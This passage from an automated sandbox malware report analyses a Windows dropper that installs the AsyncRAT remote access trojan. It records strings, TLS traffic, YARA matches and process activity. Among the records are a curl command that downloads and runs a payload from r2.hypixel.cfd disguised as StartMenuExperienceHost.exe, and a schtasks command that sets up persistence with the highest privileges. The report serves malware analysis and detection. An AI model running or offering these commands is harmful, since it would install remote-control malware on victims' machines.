                            Source: curl.exe, 00000004.00000002.1273183923.0000016CB93CB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1272893130.0000016CB93CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2.hypixel.cfd/svchost.exe(
                            Source: curl.exe, 00000004.00000002.1273129101.0000016CB9390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2.hypixel.cfd/svchost.exe-oC:
                            Source: svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                            Source: svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                            Source: svchost.exe, 00000005.00000003.1364653557.00000135A5647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1264082877.00000135A5636000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                            Source: svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                            Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                            Source: unknownHTTPS traffic detected: 172.66.0.158:443 -> 192.168.2.7:49701 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49704 version: TLS 1.2
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeCode function: 0_2_00007FF77C91C0D0 system,GetConsoleWindow,GetWindowLongW,SetWindowLongW,SetLayeredWindowAttributes,GetConsoleWindow,ShowWindow,system,_beginthreadex,system,_Thrd_detach,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,CreateThread,CreateThread,Sleep,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,CreateThread,remove,Sleep,GetConsoleWindow,ShowWindow,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@0_2_00007FF77C91C0D0
                            Source: C:\Windows\StartMenuExperienceHost.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            Operating System Destruction

                            barindex
                            Protects its processes via BreakOnTermination flag
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: 01 00 00 00 Jump to behavior

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: sslproxydump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Windows\System32\curl.exeFile created: C:\Windows\StartMenuExperienceHost.exeJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeCode function: 0_2_00007FF77C91C0D00_2_00007FF77C91C0D0
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeCode function: 0_2_00007FF77C919A100_2_00007FF77C919A10
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeCode function: 0_2_00007FF77C9121E00_2_00007FF77C9121E0
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeCode function: 0_2_00007FF77C9143500_2_00007FF77C914350
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeCode function: 0_2_00007FF77C91FE400_2_00007FF77C91FE40
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeCode function: 0_2_00007FF77C9136600_2_00007FF77C913660
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeCode function: 0_2_00007FF77C914E700_2_00007FF77C914E70
                            Source: C:\Windows\StartMenuExperienceHost.exeCode function: 12_2_00007FFAAC3B24F112_2_00007FFAAC3B24F1
                            Source: C:\Windows\StartMenuExperienceHost.exeCode function: 12_2_00007FFAAC3B622612_2_00007FFAAC3B6226
                            Source: C:\Windows\StartMenuExperienceHost.exeCode function: 12_2_00007FFAAC3B177912_2_00007FFAAC3B1779
                            Source: C:\Windows\StartMenuExperienceHost.exeCode function: 12_2_00007FFAAC3B6FD212_2_00007FFAAC3B6FD2
                            Source: C:\Windows\StartMenuExperienceHost.exeCode function: 12_2_00007FFAAC3BFCA912_2_00007FFAAC3BFCA9
                            Source: C:\Windows\StartMenuExperienceHost.exeCode function: 12_2_00007FFAAC3B10C512_2_00007FFAAC3B10C5
                            Source: C:\Windows\StartMenuExperienceHost.exeCode function: 12_2_00007FFAAC3B225912_2_00007FFAAC3B2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 16_2_00007FFAAC3E177916_2_00007FFAAC3E1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 16_2_00007FFAAC3E10FA16_2_00007FFAAC3E10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 16_2_00007FFAAC3E225916_2_00007FFAAC3E2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 18_2_00007FFAAC3D177918_2_00007FFAAC3D1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 18_2_00007FFAAC3D10FA18_2_00007FFAAC3D10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 18_2_00007FFAAC3D225918_2_00007FFAAC3D2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 19_2_00007FFAAC3D177919_2_00007FFAAC3D1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 19_2_00007FFAAC3D10FA19_2_00007FFAAC3D10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 19_2_00007FFAAC3D225919_2_00007FFAAC3D2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 20_2_00007FFAAC3D177920_2_00007FFAAC3D1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 20_2_00007FFAAC3D10FA20_2_00007FFAAC3D10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 20_2_00007FFAAC3D225920_2_00007FFAAC3D2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 23_2_00007FFAAC3E177923_2_00007FFAAC3E1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 23_2_00007FFAAC3E10FA23_2_00007FFAAC3E10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 23_2_00007FFAAC3E225923_2_00007FFAAC3E2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 25_2_00007FFAAC3C177925_2_00007FFAAC3C1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 25_2_00007FFAAC3C10FA25_2_00007FFAAC3C10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 25_2_00007FFAAC3C225925_2_00007FFAAC3C2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 27_2_00007FFAAC3A177927_2_00007FFAAC3A1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 27_2_00007FFAAC3A10FA27_2_00007FFAAC3A10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 27_2_00007FFAAC3A225927_2_00007FFAAC3A2259
                            Source: sslproxydump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: StartMenuExperienceHost.exe.4.dr, CQg6RO8lWJcEYht.csCryptographic APIs: 'TransformFinalBlock'
                            Source: StartMenuExperienceHost.exe.4.dr, k7DEUthG3QSrccC.csCryptographic APIs: 'TransformFinalBlock'
                            Source: StartMenuExperienceHost.exe.4.dr, k7DEUthG3QSrccC.csCryptographic APIs: 'TransformFinalBlock'
                            Source: svchost.exe.12.dr, CQg6RO8lWJcEYht.csCryptographic APIs: 'TransformFinalBlock'
                            Source: svchost.exe.12.dr, k7DEUthG3QSrccC.csCryptographic APIs: 'TransformFinalBlock'
                            Source: svchost.exe.12.dr, k7DEUthG3QSrccC.csCryptographic APIs: 'TransformFinalBlock'
                            Source: StartMenuExperienceHost.exe.4.dr, RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.csBase64 encoded string: 'V3UD2FZVIi3SYqeofALEN2tiKpgIowf6nPUDeiDeIwlPDjehV4IrS02lC5sZFYwn', 'KE3+yN2URlkwJR1XJK3rEAoSCVhFQvSlcVwHbOmPvRvFNp+GqH+yR42XPJnW/LqY'
                            Source: svchost.exe.12.dr, RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.csBase64 encoded string: 'V3UD2FZVIi3SYqeofALEN2tiKpgIowf6nPUDeiDeIwlPDjehV4IrS02lC5sZFYwn', 'KE3+yN2URlkwJR1XJK3rEAoSCVhFQvSlcVwHbOmPvRvFNp+GqH+yR42XPJnW/LqY'
                            Source: StartMenuExperienceHost.exe.4.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: StartMenuExperienceHost.exe.4.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: svchost.exe.12.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: svchost.exe.12.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.evad.winEXE@30/6@4/5
                            Source: C:\Windows\StartMenuExperienceHost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2552:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
                            Source: C:\Windows\StartMenuExperienceHost.exeMutant created: \Sessions\1\BaseNamedObjects\HtJDJt7FEenilHh1
                            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7848:120:WilError_03
                            Source: C:\Windows\StartMenuExperienceHost.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to behavior
                            Source: 18sFhgSyVK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Windows\StartMenuExperienceHost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: 18sFhgSyVK.exeReversingLabs: Detection: 23%
                            Source: unknownProcess created: C:\Users\user\Desktop\18sFhgSyVK.exe "C:\Users\user\Desktop\18sFhgSyVK.exe"
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color b
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\StartMenuExperienceHost.exe C:\Windows\StartMenuExperienceHost.exe
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
                            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
                            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silentJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color bJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exeJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silentJump to behavior
                            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\StartMenuExperienceHost.exe C:\Windows\StartMenuExperienceHost.exeJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeSection loaded: msvcp140.dllJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeSection loaded: vcruntime140_1.dllJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeSection loaded: vcruntime140.dllJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeSection loaded: vcruntime140.dllJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeSection loaded: vcruntime140_1.dllJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeSection loaded: vcruntime140.dllJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
